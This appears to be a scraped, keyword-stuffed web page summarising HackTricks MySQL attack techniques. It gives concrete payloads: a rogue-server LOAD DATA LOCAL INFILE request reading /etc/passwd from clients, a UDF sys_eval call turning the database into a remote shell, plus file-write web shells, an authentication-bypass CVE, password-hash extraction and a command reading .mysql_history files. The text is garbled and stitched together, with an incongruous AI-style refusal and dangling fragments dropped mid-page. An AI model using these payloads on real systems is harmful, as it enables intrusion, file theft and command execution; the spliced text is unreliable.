Mysql Hacktricks Verified
Перейти к содержимому

Mysql Hacktricks Verified

This is a classic but often overlooked. If you can trick an admin or app server into connecting to your malicious MySQL server, you can read arbitrary files from the client.

How it works (verified):
Your fake server sends a LOAD DATA LOCAL INFILE request during handshake. Vulnerable clients (e.g., old PHP mysqli with allow_local_infile=ON, MySQL Workbench, or outdated connectors) will send back any file the client user can read.

Automation: Use RogueMySQL or mysql-fake-server tools. The payload is:

-- Your malicious server sends:
execute_command_request("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE test FIELDS TERMINATED BY '\n';")

This is a verified hacktricks classic for network pivoting.

  • Execution: 
    CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys.so';
SELECT sys_eval('whoami');

    • This effectively turns the database into a remote shell, bypassing file system restrictions that block webshell writing.

    Always check:

    These verified techniques are part of the HackTricks MySQL Methodology – always test on authorized systems only.

    On HackTricks, "verified" methods are those that have been tested and confirmed to work under specific configurations. Key informative areas covered include: 1. Enumeration and Information Gathering

    Before an exploit, a security professional identifies the environment. HackTricks outlines how to verify:

    Version & User: Using commands like SELECT version(); and SELECT user();.

    Privileges: Checking if the current user has FILE privileges or administrative rights via SELECT * FROM mysql.user. mysql hacktricks verified

    Database Structure: Mapping tables and columns using the information_schema. 2. Exploitation Techniques Verified methods for gaining deeper access often include:

    SQL Injection (SQLi): Detailed payloads for Union-based, Error-based, and Blind SQL injection to extract data.

    Reading/Writing Files: If the secure_file_priv variable is empty, using LOAD_DATA(), LOAD_FILE(), or SELECT ... INTO OUTFILE to read sensitive system files (like /etc/passwd) or write a web shell.

    User Defined Functions (UDF): A verified path for Privilege Escalation, where a malicious library is uploaded to the server to execute system-level commands (RCE). 3. Common Authentication Bypasses

    HackTricks documents known vulnerabilities in older or misconfigured versions, such as the MySQL Authentication Bypass (CVE-2012-2122), where a user could log in with any password by repeatedly attempting to connect. 4. Post-Exploitation Once access is gained, verified steps involve: Extracting password hashes from mysql.user. This is a classic but often overlooked

    Searching for sensitive data like API keys or personal information. Checking for cleartext credentials in configuration files.

    For the most up-to-date and specific payloads, the MySQL page on HackTricks serves as the primary technical reference for these "verified" methods.

    I can’t help create or promote hacking, exploiting, or bypassing security for MySQL or any other system.

    If you want a legitimate, complete essay, I can write one on safe, legal topics such as:

    Which of those (or another lawful topic) would you like? If you choose one, I’ll produce a full essay. This is a verified hacktricks classic for network pivoting

    cat ~/.mysql_history
/home/user/.mysql_history
/root/.mysql_history